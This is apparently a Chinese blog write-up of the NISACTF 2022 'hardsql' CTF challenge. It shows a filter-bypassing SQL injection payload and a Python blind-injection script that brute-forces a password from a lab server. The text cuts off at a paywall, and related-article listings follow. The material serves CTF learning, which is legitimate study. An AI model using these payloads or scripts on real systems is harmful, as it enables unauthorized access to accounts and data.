记录一次quine注入的学习

已于 2022-08-27 21:11:06 修改
阅读量877 收藏 8
点赞数 4
文章标签: web安全 学习 php
于 2022-08-24 19:45:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zh1A0/article/details/126511407
版权

题目地址:[NSSCTF - NISACTF 2022]hardsql (ctfer.vip)

是一个sql注入的题目,题目描述有如下提示

$password=$_POST['passwd'];
$sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";

用户名必须为’bilala’,password内容可控

在这里插入图片描述

fuzz一下,过滤了if,sleep,char,||,=,空格等,但是有一点是题目给出了查询语句,也就是我们知道了表明字段名,而且or没有被过滤,这就可以使用like去代替=,用/**/代替空格去进行盲注

payload=1'/**/or/**/passwd/**/like/**/'b2%'# 回显成功,第一位为b

写出盲注脚本

import requests
url = "http://1.14.71.254:28409/index.php"
set = 'qwertyuiopasdfghjklzxcvbnm0123456789'
password = ""
for i in range(1,50):
    for j in set:
        payload = "-1'/**/or/**/passwd/**/like/**/'{}%'#".format(password + j)
        data = {
   'username': 'bilala', 'passwd': payload}
        resp = requests.post(url=url,data=data)
        #print(res.text)
        if "wrong password" in resp.text:
            password += j
            print(password)
            break
print(password)

得到密码b2f2d15b3ae082ca29697d8dcd420fd7

登入之后并没有flag而是给出了源码

<?php
//多加了亿点点过滤

include_once("config.php");
function
最低0.47元/天 解锁文章
Zh1A0505
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
[NISACTF 2022]hardsql - quine注入
oZuoShen123的博客
10-05 584
题目描述:`$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";` 从描述看出是quine注入,且用户名要是bilala 1、经测试,参数为:username=&passwd=&login=登录,username必须为bilala 2、【= and 空格】被过滤【like or /**/】 3、参考文章:https://blog.csdn.ne
SQL注入Quine注入
Aiwin的博客
06-29 2645
SQL注入Quine注入
[HDCTF 2023]LoginMaster 复现 (记quine注入
qq_73767109的博客
04-24 875
benchmark时间盲注 [HDCTF 2023]LoginMaster 复现 quine注入解释
HSCCTF-WEB-PWD(quine注入
最新发布
m0_74855736的博客
03-12 868
思路:爆破密码,但like被过滤,因为界面显示,无论访问成功与否都是一样的,无法使用布尔盲注,时间盲注的化sleep,if,substr等函数也被禁用,该题使用一种quine注入的技巧。quine是一种计算机程序,它不接受输入并产生自己源代码的副本作为唯一的输出。里面是空表,因此需要我们的输入与最后的结果相等绕过验证,这就需要用到Quine。先将str里的双引号替换成单引号,再用str替换str里的间隔符。的双引号换成单引号,这样最后就不会出现引号不一致的情况了。中的间隔符使用双引号的原因是,
sql注入 Quine注入解析
arcuied
04-24 854
sql注入 Quine注入解析
nextjs-quine:Next.js应用https的一个Quine
04-01
这是一个用引导的项目。 入门 首先,运行开发服务器: npm run dev # or yarn dev 用浏览器打开以查看结果。 您可以通过修改pages/index.js来开始编辑页面。 页面在您编辑文件时自动更新。 可以在上访问。 可以...
qmc.zip_Sharp_quine
09-23
Quine-McCluskey算法,简称QMC算法,是一种用于简化布尔表达式的方法,它主要用于逻辑设计中的化简问题,帮助减少逻辑门的数量,提高电路效率。在C#编程语言中实现QMC算法,可以让我们更深入地理解其原理,并在实际...
QM.zip_qm_quine mccluskey
09-23
Quine-McCluskey(简称QMC)算法是一种用于化简布尔表达式的经典方法,尤其在数字逻辑设计和计算机科学领域中广泛应用。...这个压缩包中的代码实现,对于学习和研究这一主题来说,无疑是一个宝贵的资源。
Quine:一个可自行打印的Java程序
05-07
我选择使用Java是因为我是最有经验的高级语言,所以我花了很多时间在尝试这个想法之前先花了很多时间,然后才知道使用另一种语言会需要更多的工作来重新学习。 我也不太清楚这种配置可能需要哪些工具或库,而且我...
Quine-McCluskey_algorithm_(Java).zip_quine mccluskey _quine-mccl
09-24
理解并实现Quine-McCluskey算法对于学习和实践数字逻辑设计至关重要,因为该算法能够帮助我们生成逻辑门电路的最小化表达,从而实现更高效、更节省资源的硬件设计。在Java这样的编程语言中实现它,不仅能够加深对...
[NISACTF 2022]hardsql
m0_70819573的博客
03-20 432
关键是它要求强比较相同,但弱比较不同,所以要用到Quine,Quine是一种自生产技术,可以使数据库输入和输出相同。3.当失败时会回显nothing found,以此可以爆破密码。爆破出密码登入后没有给flag,而是给了源码。1.打开环境,发现一个登录窗口。
(超详细)[NISACTF 2022]hardsql——writeup
qq_74426248的博客
07-25 401
本文章为[NISACTF 2022]hardsql——writeup,欢迎各位师傅一起讨论!!!
Quine.c
Lyh's Blog
08-17 374
目录Quine一般的Quine程序结构Quine案例分析我自己编写的Quine Quine 什么是Quine?根据Wiki上的定义,Quine是一个计算机程序,它不需要输入,却可以将自己的源代码输出。 一般的Quine程序结构 Quine程序一般由两部分组成,一部分是代码,另一部分是数据(以保存源代码)。在最常见的Quine中,程序会将自己输出两次,一次用来填充代码部分,一次用来填充数据部分 Quine案例分析 来看下面这个Quine char*f="char*f=%c%s%c;main(){printf(
[NISACTF 2022]
snowlyzz的博客
09-09 6103
NISACTF部分WP
NISACTF2022公开通道(复现)
as you know, nlp is fantasitc!
03-31 4748
目录middlerce(复现)join-us(复现)hardsql(复现) middlerce(复现) <?php include "check.php"; if (isset($_REQUEST['letter'])){ $txw4ever = $_REQUEST['letter']; if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
Quine----输出本身的程序
qq_36403266的博客
01-30 7195
程序在我们的日常生活中扮演了重要角色,小到吃饭刷卡,达到发射火箭,似乎无所不能。那么问题来了,有能输出本身源代码的程序吗? 这似乎是个死循环,就“如要理解递归,就要理解递归”一样。然而,如果我们采取一些巧妙的方法,还是有方法实现的,并且实现的方法不止一种。人们把这种程序称为“Quine”。下面是一个使用C++语言的Quine。 123#include char*s="#includ
Quine——写一个程序,使其能输出自己的源代码。
Washington89757的博客
09-02 298
挺有意思的一道题目。
quine-mccluskey method
11-30
Quine-McCluskey方法是一种用于最小化布尔函数的方法。它通过将布尔函数转换为最简化的多项式形式,以便更容易地实现或设计电路。 该方法的基本思想是使用卡诺图(Karnaugh map)的拓展版本来找到所有的重要项。首先,将布尔函数的真值表转化为卡诺图,然后根据卡诺图中的相邻位单元(最大化相邻的1)进行合并。这些合并操作可以产生更小的项,将真值表中不必要的变量进行消除,最终得到最简化的布尔表达式。 在使用Quine-McCluskey方法时,以下步骤是关键的: 1. 将布尔函数的真值表转换为卡诺图,并将1的位填入相应的格子中。 2. 找到卡诺图中所有的重要项-这些项代表着最后的布尔表达式中的主要组成部分。 3. 按照卡诺图的规则合并相邻位单元(最大化1的位数)。这些合并操作将产生更小的项,减少布尔表达式的复杂性。 4. 继续合并、消除和处理其他重要项,直到不能再进行合并操作为止。 5. 最后,根据卡诺图的结果,得到最简化的布尔表达式。 Quine-McCluskey方法是一种有效的方法,可以用于减少布尔函数的大小,并简化相应的电路设计过程。尽管手工计算非常费时且容易出错,但现代计算机系统可以自动化这一过程,使得设计人员能够更快速、准确地处理复杂的布尔函数。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zh1A0505

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值